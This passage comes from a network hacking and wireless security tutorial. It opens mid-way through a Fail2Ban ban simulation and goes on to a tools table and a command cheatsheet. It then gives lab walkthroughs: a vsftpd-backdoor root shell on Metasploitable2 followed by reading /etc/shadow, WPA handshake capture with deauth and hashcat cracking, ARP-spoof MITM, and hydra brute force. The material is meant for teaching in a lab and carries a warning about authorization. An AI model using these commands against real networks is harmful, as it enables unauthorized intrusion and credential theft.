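Jan 10 12:05:00 srv sshd[2006]: Accepted password for alice from 192.168.1.20 port 50001 ssh2
Jan 10 12:20:00 srv sshd[2007]: Failed password for alice from 192.168.1.20 port 50002 ssh2
Jan 10 12:40:00 srv sshd[2008]: Failed password for alice from 192.168.1.20 port 50003 ssh2
Jan 10 13:00:10 srv sshd[2009]: Failed password for root from 192.168.1.50 port 40005 ssh2
Jan 10 13:00:12 srv sshd[2010]: Failed password for root from 192.168.1.50 port 40006 ssh2
Jan 10 13:00:15 srv sshd[2011]: Failed password for root from 192.168.1.50 port 40007 ssh2
"""

def find_bans(log_text, maxretry=3, findtime=600, bantime=3600, year=2024):
    """Return (ip, ban_start, ban_end) for every ban these settings would produce."""
    failures = defaultdict(deque)     # ip -> failure times inside findtime
    banned_until = {}
    bans = []
    for line in log_text.splitlines():
        m = FAIL_RE.match(line)
        if m is None:
            continue                  # successful logins and other daemons
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip = m["ip"]
        if ts < banned_until.get(ip, datetime.min):
            continue                  # source is blocked; the attempt is not counted
        q = failures[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > findtime:
            q.popleft()               # forget failures older than findtime
        if len(q) >= maxretry:
            banned_until[ip] = ts + timedelta(seconds=bantime)
            bans.append((ip, ts, banned_until[ip]))
            q.clear()                 # counting starts again after the ban
    return bans

if __name__ == "__main__":
    for ip, start, end in find_bans(SAMPLE_LOG):
        print(f"ban {ip} from {start:%H:%M:%S} until {end:%H:%M:%S}")
```

The user who mistypes a password three times over 40 minutes is never banned, while the source that returns right after its ban expires is banned again.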

✅ Chapter 10 Summary

  • Default DROP policy → let only allowed traffic pass
  • Detect port scans and brute force with Snort rules
  • Turn off WPS; use WPA3 or WPA2-AES
  • Fail2Ban = the best defense against brute force
Chapter 11
🔧 Tools Reference
All important network security tools in one place

📋 Complete Tools Reference

| Tool | Category | Purpose | Install |
|---|---|---|---|
| nmap | Scanning | Port scan, OS/service detect, NSE scripts | Pre-installed (Kali) |
| masscan | Scanning | Ultra-fast internet-wide scan | apt install masscan |
| netdiscover | Discovery | ARP-based host discovery | Pre-installed |
| wireshark | Analysis | GUI packet capture and analysis | Pre-installed |
| tcpdump | Analysis | CLI packet capture | Pre-installed |
| aircrack-ng | Wireless | WEP/WPA crack suite | Pre-installed |
| hashcat | Password | GPU-based hash cracking | Pre-installed |
| hydra | Brute Force | Online network brute force | Pre-installed |
| bettercap | MITM | ARP spoof, MITM framework | apt install bettercap |
| metasploit | Exploitation | Exploit framework | Pre-installed |
| hcxdumptool | Wireless | PMKID/handshake capture | apt install hcxdumptool |
| reaver | Wireless | WPS PIN attack | Pre-installed |
| enum4linux | SMB | Windows/Samba enumeration | Pre-installed |
| crackmapexec | Windows | Windows network auditing | apt install crackmapexec |
| responder | Windows | LLMNR/NBT-NS poisoning | Pre-installed |
| snort | Defense | IDS/IPS | apt install snort |
| fail2ban | Defense | Brute force protection | apt install fail2ban |
| gobuster | Web/DNS | Directory and DNS brute force | Pre-installed |
| wifite | Wireless | Automated WiFi attack tool | Pre-installed |
| proxychains | Anonymity | Proxy a tool's traffic | Pre-installed |

⌨️ Quick Command Cheatsheet

═══ NETWORK RECON ═══
nmap -sV -O -A target                              # Full aggressive scan
nmap -p- -T4 target                                # All ports fast
netdiscover -r 192.168.1.0/24                      # ARP discovery
dig target.com ANY                                 # DNS all records
enum4linux -a target                               # Windows enum

═══ WIRELESS ═══
airmon-ng start wlan0                              # Monitor mode
airodump-ng wlan0mon                               # Network scan
airodump-ng -c 6 --bssid BSSID -w out wlan0mon     # Capture
aireplay-ng -0 5 -a BSSID wlan0mon                 # Deauth
aircrack-ng out-01.cap -w rockyou.txt              # Crack
hcxpcapngtool -o hash.hc22000 out-01.cap           # Convert
hashcat -m 22000 hash.hc22000 rockyou.txt          # GPU crack

═══ MITM ═══
echo 1 > /proc/sys/net/ipv4/ip_forward             # Enable forward
arpspoof -i eth0 -t victim gateway                 # ARP spoof
bettercap -iface eth0                              # Bettercap
tcpdump -i eth0 -A port 80                         # HTTP sniff

═══ BRUTE FORCE ═══
hydra -l root -P rockyou.txt ssh://target          # SSH
hydra -l admin -P pass.txt ftp://target            # FTP
hydra -l admin -P pass.txt rdp://target            # RDP

═══ ANONYMITY ═══
macchanger -r wlan0                                # Random MAC
proxychains nmap target                            # Via proxy
ssh -D 1080 user@server                            # SOCKS proxy
wg-quick up wg0                                    # WireGuard VPN

═══ DEFENSE ═══
iptables -P INPUT DROP                             # Default block
fail2ban-client status sshd                        # Ban status
snort -i eth0 -A console                           # IDS mode
suricata -i eth0                                   # Suricata IDS
Chapter 12
🚀 Real-World Lab Scenarios
Home Lab Setup, Practice Scenarios, CTF Network Challenges

🏠 Set Up Your Home Lab

════ VirtualBox Lab Setup ════

Create the machines:
1. Kali Linux — Attacker machine (2GB RAM, 2 CPU)
2. Metasploitable2 — Vulnerable Linux target
3. Windows 7/10 — Windows target (DVWA, VulnHub)
4. Ubuntu Server — Web server target

Network Settings:
All machines → Host-Only Adapter → vboxnet0
or Internal Network → "labnet"

Metasploitable2 download:
https://sourceforge.net/projects/metasploitable/

Default credentials:
Username: msfadmin
Password: msfadmin

Vulnerable services in Metasploitable2:
Port 21   — vsftpd 2.3.4 (backdoor!)
Port 22   — OpenSSH 4.7
Port 23   — Telnet
Port 25   — Postfix
Port 80   — Apache + DVWA + phpMyAdmin
Port 139  — Samba (username map script vuln)
Port 3306 — MySQL (no password for root!)
Port 5432 — PostgreSQL
Port 6667 — IRC (Unreal IRCd backdoor)
Port 8180 — Apache Tomcat

🎯 Lab Scenario 1: Full Network Pentest

Target: Metasploitable2 (192.168.56.101)
Attacker: Kali Linux (192.168.56.100)

STEP 1: Reconnaissance
$ nmap -sV -O -A 192.168.56.101
[+] 21/tcp open ftp vsftpd 2.3.4
[+] 22/tcp open ssh OpenSSH 4.7
[+] 80/tcp open http Apache 2.2.8
[+] 3306/tcp open mysql MySQL 5.0.51a

STEP 2: Vulnerability Check
$ nmap --script=vuln 192.168.56.101
[!] vsftpd 2.3.4 - Backdoor Command Execution

STEP 3: Exploit vsftpd backdoor
$ msfconsole
msf> use exploit/unix/ftp/vsftpd_234_backdoor
msf> set RHOSTS 192.168.56.101
msf> run
[+] Command shell session 1 opened!
id
uid=0(root) gid=0(root) groups=0(root)

STEP 4: Post Exploitation
$ cat /etc/passwd
$ cat /etc/shadow
$ uname -a
$ ss -tlnp

📶 Lab Scenario 2: WiFi Security Test

Target: Your own home WiFi (authorized!)
Hardware: Alfa AWUS036NHA adapter

STEP 1: Monitor mode enable
$ airmon-ng check kill
$ airmon-ng start wlan1
monitor mode enabled on wlan1mon

STEP 2: Target scan
$ airodump-ng wlan1mon
BSSID              PWR  CH  ENC   ESSID
AA:BB:CC:DD:EE:FF  -55  6   WPA2  MyHomeNetwork

STEP 3: Capture handshake
$ airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w test wlan1mon

STEP 4: Force handshake (deauth)
$ aireplay-ng -0 3 -a AA:BB:CC:DD:EE:FF wlan1mon
WPA handshake: AA:BB:CC:DD:EE:FF   ← seeing this means the capture succeeded

STEP 5: Password test
$ hcxpcapngtool -o hash.hc22000 test-01.cap
$ hashcat -m 22000 hash.hc22000 rockyou.txt
If a result is found → the password is weak → change it!

🌐 Online Practice Platforms

| Platform | URL | Type | Price |
|---|---|---|---|
| TryHackMe | tryhackme.com | Guided labs, Network rooms | Free + Premium |
| HackTheBox | hackthebox.com | Real machines, CTF | Free + VIP |
| VulnHub | vulnhub.com | VM download, offline | Free |
| PentesterLab | pentesterlab.com | Web + Network | Free + Pro |
| OffSec Proving Grounds | offensive-security.com | Network pentesting | Paid |
| PicoCTF | picoctf.org | CTF for beginners | Free |

🎓 Certification Roadmap

🟢 CompTIA Network+: Networking fundamentals, start with this
🔵 CompTIA Security+: Security basics, industry standard
🟠 CEH (Certified Ethical Hacker): Network hacking techniques
🔴 eJPT (eLearnSecurity Junior Pentest): Practical, beginner pentest
🟣 OSCP (Offensive Security): Gold standard — the hardest and most respected

🎯 What You Can Now Do

  • 🌐 Understand OSI/TCP-IP and know where attacks happen
  • 🔍 Perform comprehensive network reconnaissance with Nmap
  • 📶 Understand and test WEP/WPA/WPA2 wireless security
  • 🎭 Perform ARP spoofing, DNS spoofing and MITM attacks (in the lab)
  • 👃 Analyze network traffic with Wireshark/tcpdump
  • 🔥 Configure firewall rules and an IDS
  • 🔒 Set up a VPN and SSH tunnels
  • 🛡️ Implement network hardening and defense

📡 "The network is the battlefield — know it better than your enemy."

Practice everything only on your own network or authorized lab. Accessing others' systems without permission is punishable by law.

Network Hacking & Wireless Security v1.0 — 12 Chapters | Complete Bengali Guide